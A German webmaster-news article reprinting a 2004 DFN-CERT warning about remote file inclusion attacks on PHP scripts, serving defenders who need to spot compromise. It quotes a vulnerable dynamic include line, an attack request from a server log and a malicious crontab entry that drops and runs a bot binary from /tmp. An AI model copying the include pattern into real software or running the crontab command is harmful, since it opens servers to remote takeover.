Navigation
 Startseite
 Fachbücher
 Forum
 Webmaster News
 Script Newsletter
 Kontakt
 Script Installation
 Php
 Php Tutorials
 Impressum

Community-Bereich
 kostenlos Registrieren
 Anmelden
 Benutzerliste

Script Datenbank
 Script Archiv
 Script Top 20
 Screenshots
 Testberichte

Suche
 
Script Seite

Unsere Php Scripts
 Counter Script
 Umfrage Script
 Bilder Upload Script
 Terminverwaltung
 Simple PHP Forum
 RSS Grabber

Script Mods
 phpBB Adsense Mode

Tools und Generatoren
 .htpasswd Generator
 md5 Generator
 base64 Generator
 ICQ Generator
 Colorpicker
 Unix timestamp Tool
 TLD Liste
 Webkatalog Verzeichnis

Partner
Sprüche Treff

Artfiles.de
Bietet Serviceorientierte Internetdienstleistungen...
http://www.Artfiles.de
speicherzentrum.d...
Bei den Anbieter bekommt man Webspace, Domains und...
http://www.speicherzentrum.de
 
 
 

DFN-CERT warnt vor Angriffen auf Webserver mit unsicheren PHP-Skripten

Sie befinden sich: Home > Webmaster News

Das DFN-CERT und weitere deutsche CERTs (Computer Emergency Response Teams) registrieren nach eigenen Angaben zurzeit massive Angriffe auf Webserver mit unsicheren PHP-Skripten. In diese Skripte lässt sich weiterer Skript-Code einschleusen, der beispielsweise von einem anderem Webserver nachgeladen und ausgeführt wird. Laut Meldung finden sich auf bereits kompromittierten Systemen IRC-Bots, über die der Rechner fernsteuerbar ist und für weitere Angriffe missbraucht werden kann.

Betroffen sind Systeme, bei denen in der php.ini die Option allow_url_fopen = on gesetzt ist und sich ein Skript aufrufen lässt, das dynamisch Code nachlädt, beispielsweise so:

if ( !isset( $realm) ) { include "home.template" ; } else { include $realm ; }

Anstelle des Pfades zu einer lokalen Datei ist es so möglich, eine URL zu einer Datei auf einem Webserver anzugeben. Der include-Befehl lädt das Skript von dort aus nach und bindet ihn ein. Liegt der Exploit-Code bereit und ist ein verwundbares Skript gefunden, kann ein Angreifer über einen einzigen HTTP-Get-Request die Attacke starten.

Das DFN-CERT rät, derart konfigurierte Systeme nach Einbruchsspuren zu untersuchen. Sollte in den Logdateien des eigenen Webservers Einträge wie

[28/Sep/2004:18:03:07 +0200]
"GET /pfad/zu/einem/script.php? variablenname=http: / /192.168.1.2:4213/ HTTP/1.0" 200 15183 " - " "Wget/1.8.1"


oder ähnliche vorhanden sein, ist das System eventuell bereits kompromittiert. Der IRC-Bot soll sich anhand eines Eintrages in der Crontab erkennen lassen:


# " 17710511410 [ . . . ] 0037777777777" > /tmp/tblihjauk ; chmod 700 /tmp/tblihjauk ; /tmp/tblihjauk x ; rm -f /tmp/tblihjauk34 * * * * /bin/echo `crontab -l|grep ' . {666 } ' |sed 's/ ^ . /echo -e -n/ ' ` |sh

Nach ersten Erkenntnissen wurden bislang nur Linux-Systeme kompromittiert, allerdings ist die Lücke prinzipiell auch unter anderen Betriebssystemen ausnutzbar.

(Quelle: www.heise.de )

Eingetragen am 18.10.2004


Schreib ein Kommentar

Name
Mail
Webseite
Kommentar